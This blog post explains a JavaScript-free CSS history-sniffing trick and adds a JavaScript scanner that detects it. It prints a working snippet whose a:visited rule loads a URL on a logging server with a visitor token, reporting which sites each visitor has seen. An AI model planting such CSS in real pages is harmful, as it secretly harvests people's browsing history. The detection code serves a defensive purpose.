The show must go on – Part 2

I don’t know why, but at least in the community of web hackers, there’s no continuity in releasing stuff at all. Sometimes there’s nearly nothing interesting for about a week or two, and then as soon as someone posts something cool, everyone has something to release. As I already said: I don’t know why :)

Anyway, this time RSnake has done a very good job investigating JavaScript-less web hacking. He found a way to use a variant of the CSS History Hack, which was originally found by Jeremiah Grossman, but without a single line of JavaScript. Here you can find RSnake’s blog post on that. By the way, we have to say that Markus Jakobsson, Tom N. Jagatic, and Sid Stamm had already found this issue, but none of us had seen it. Shame on us; go read their original post.

Now let’s have a look at this non-JavaScript technique:

First, we need a server-side script which just stores every request made to it in a database, a logfile or somewhere else. Then we have a website with source like the following:

<html><head><style>
a:visited #s0 {background:url("http://[domain].com/[the_script]?url=http://www.disenchant.ch/&token=[an_unique_id]")}
</style></head><body>
<a href="http://www.disenchant.ch/"><span id="s0">visited</span></a>
</body></html>

With this simple code, the browser of every visitor for whom the link counts as visited will send a request to our prepared server-side script, which can then log that the user with token xyz has already visited disenchant.ch. Of course, this could be any site you can imagine. Once more, very cool stuff from RSnake.
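Because the trick lives entirely in the stylesheet, it can be spotted statically when filtering user-supplied markup or reviewing a page. The following is an added example, not code from the original post or from RSnake: it lists style rules whose selector uses :visited and whose declarations load a url(). The function names and the logger.example host are assumptions, and the sample HTML is constructed.

```javascript
// Added example: flag CSS rules that fetch a resource only when a link
// matches :visited. Regex-based; it does not decode CSS escape sequences.
// SAMPLE_HTML is constructed; logger.example is a placeholder host.
const SAMPLE_HTML = `<html><head><style>
a:visited #s0 {background:url("http://logger.example/log?url=http://www.disenchant.ch/&token=t0")}
a:visited {color: purple}
@media screen { a:VISITED #s1 { background: url(//logger.example/log?id=s1) } }
#banner {background:url("/img/banner.png")}
</style></head><body></body></html>`;

// Pull the contents of every <style> element out of an HTML string.
function extractStyleBlocks(html) {
  const blocks = [];
  const re = /<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) blocks.push(m[1]);
  return blocks;
}

// Return [{selector, urls}] for each rule whose selector uses :visited
// and whose declarations reference at least one url().
function findVisitedFetches(css) {
  const findings = [];
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ''); // drop CSS comments
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g; // innermost rules, also inside @media
  const urlRe = /url\(\s*(["']?)([\s\S]*?)\1\s*\)/gi;
  let rule;
  while ((rule = ruleRe.exec(text)) !== null) {
    const visited = rule[1].split(',').map(s => s.trim())
      .filter(s => /:visited\b/i.test(s));
    if (visited.length === 0) continue;
    const urls = [];
    let u;
    urlRe.lastIndex = 0;
    while ((u = urlRe.exec(rule[2])) !== null) urls.push(u[2]);
    // A :visited rule that only changes colour is harmless; one that loads
    // a URL reports the visitor's history to whoever serves that URL.
    if (urls.length > 0) findings.push({ selector: visited.join(', '), urls });
  }
  return findings;
}

// Scan every <style> block of a page and collect the findings.
function scanHtml(html) {
  return extractStyleBlocks(html).flatMap(findVisitedFetches);
}
```

Calling scanHtml(SAMPLE_HTML) reports the two :visited rules that load a URL and skips both the colour-only :visited rule and the ordinary #banner background.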

For those of you (guys and of course girls ;) ) who would like to try this out and don’t want to write your own code, you can use the Noscript HScan builder written by pdp.

